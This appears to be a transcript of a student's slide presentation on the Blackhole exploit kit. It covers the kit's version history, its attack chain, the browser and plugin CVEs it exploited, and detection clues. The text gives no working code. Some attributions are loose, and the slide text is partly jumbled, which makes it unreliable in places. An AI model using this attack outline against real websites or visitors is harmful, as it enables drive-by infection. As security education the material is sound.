web threat evolution: blackhole toolkit for hacking cms websites
DESCRIPTION
Web Threat Evolution: Black HoleToolkit. It is currently ranked 1 in the world for online threats(In year 2013). Malicious hackers sometimes use toolkits, pre-packaged pieces of computer code, which make it very easy to distribute malware, infect websites with it and then perform specific malicious activities with the now compromised site(s). The strain of malware which we will discuss is related to a toolkit popularly known as the Blackhole Toolkit. This toolkit has been available for some time now and researchers have noted the same. Malicious hackers are infecting websites in droves using new kinds of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors. In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. Blackhole Toolkit was developed by Anonymous Russian Hacker Group. Core Language of Development: PHP. Payload: Java Based Components. Uses Website Traffic to get access of other Systems(Victims). Hacker Attacks Web Hosting Servers. Blackhole Exploit Kit is a threat that is spreading. It is currently ranked 1 in the world for online threats(In year 2013). Blackhole Exploit Kit has been detected by AVG on victims' machines in 218 countries during the last month. There are currently 50759 websites in 145 countries that host Blackhole Exploit Kit.TRANSCRIPT
Deep Mehta 8th IT
Web Threat Evolution: Black HoleToolkit
Name: Deep MehtaCollege: Silver Oak College of Engineering &
Technology.
Deep Mehta 8th IT
Malicious hackers sometimes use toolkits, pre-packaged pieces of computer code, which make it very easy to distribute malware, infect websites with it and then perform specific malicious activities with the now compromised site(s).
The strain of malware which we will discuss is related to a toolkit popularly known as the Blackhole Toolkit. This toolkit has been available for some time now and researchers have noted the same.
What are Toolkits?
Deep Mehta 8th IT
Malicious hackers are infecting websites in droves using new kinds of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors. In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors.
Why Hacker use this Malware
Deep Mehta 8th IT
History of the Blackhole kit Version Release date
2.0 09/2012
1.2.5 07/30/2012
1.2.4 07/11/2012
1.2.3 03/28/2012
1.2.2 02/26/2012
1.2.1 12/09/2011
1.2.0 11/09/2011
1.1.0 06/26/2011
1.0.2 11/20/2010
1.0.0 beta 08/2010
Blackhole Toolkit was developed by Anonymous Russian Hacker Group.
Core Language of Development: PHP.
Payload: Java Based Components.
Uses Website Traffic to get access of other Systems(Victims).
Hacker Attacks Web Hosting Servers.
Deep Mehta 8th IT
Blackhole Exploit Kit is caused by a code that can be hacked into a webpage. When you browse to a webpage with Blackhole Exploit Kit, it will identify and make use of the vulnerabilities in your internet browser/plugins and force adware, phishing programs or any other type of fraudulent software to be installed on your device.
Blackhole Exploit Kit is a threat that is spreading. It is currently ranked 1 in the world for online threats. Blackhole Exploit Kit has been detected by AVG on victims' machines in 218 countries during the last month. There are currently 50759 websites in 145 countries that host Blackhole Exploit Kit.
Blackhole Toolkit Statistics
Deep Mehta 8th IT
Deep Mehta 8th IT
The leading clue was the file named 27 in the file upload directory. This is the location where new executable payloads are uploaded for further distribution to the infected endpoints.
This file was not something one would generally expect to find there: not the usual botnet executable or keylogger installer, which are generally observed as payloads, but a copy of the infamous C99Shell backdoor, which is the most popular tool of choice for hacking into websites.
How it can be detected in Websites
Deep Mehta 8th IT
Unsuspecting Internet surfers visit websites harboring malicious IFrame tags
Users are then redirected to servers which load malicious payloads via browser exploits or PDF, SWF based exploits
Often, a malicious JAR file is downloaded on the PC of the unsuspecting client
This JAR file contains malicious URLs which download further malware The downloaded trojan(s) can post a unique ID to a command-and-
control server The trojan then posts a list of the running processes on the victim’s
computer to the server The following three plugins are then downloaded: stopav.plug – Tries to disable the antivirus installed on the victim’s
computer passw.plug – Log username/password combinations for connections
being made miniav.plug – Tries to delete copies of Zeus bots on the computer to
prevent competition amongst malware on victim’s computer Finally, a fake Anti-Virus program is downloaded to the victim’s
computer.
Attack Process of the Blackhole Toolkit
Deep Mehta 8th IT
Initial vector:The victim is supplied with a carrier which offers a hyperlink to initiate the chain of events.
Redirections:The hyperlink from the previous stage is redirected through intermediate sites to make tracing of the attack complicated.
Mainfile:The hosting server is contacted and the server code collects and distributes the set of exploit functions for the targeted host.
Downloadfile:After any of the served exploits from the previous phase activated, its downloader code (shellcode or script) connects back and the server code distributes the binary (Win32) executable payload.
Chain of Events Which gets triggered in background
Deep Mehta 8th IT
Exploit Selection Logic
Deep Mehta 8th IT
spl0: empty 14 spl1: missing 14 spl2: MDAC exploit MS06-
01415 spl3: PDF 15 spl4: Windows Help and
Support Center Vulnerability 18
spl5: Flash- CVE-2011-061118
spl6: Flash CVE-2011-211019
spl7: XML Core Services -CVE-2012-1889 20
NOJS: Java – CVE-2010-0840e
Different Type of Exploits Available
Different Type of Plugin Used for Exploits
Operating system Web browser name and
browser version Adobe Flash version Adobe Reader version Java version QuickTime DevalVR Shockwave Windows Media Player Silverlight VLC Player RealPlayer
Deep Mehta 8th IT
Personal Experience
Deep Mehta 8th IT
http://www.avg.com/in-en/press-releases-news.ndi-1563
http://www.symantec.com/connect/blogs/blackhole-theory
http://www.stopthehacker.com http://www.avg.com/in-en/press-releases-
news.ndi-3723 http://news.softpedia.com/news/Blackhole-Toolkit-
Served-by-Spam-Ahead-of-Tax-Season-251438.shtml
http://nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit
References
Deep Mehta 8th IT
Thank You.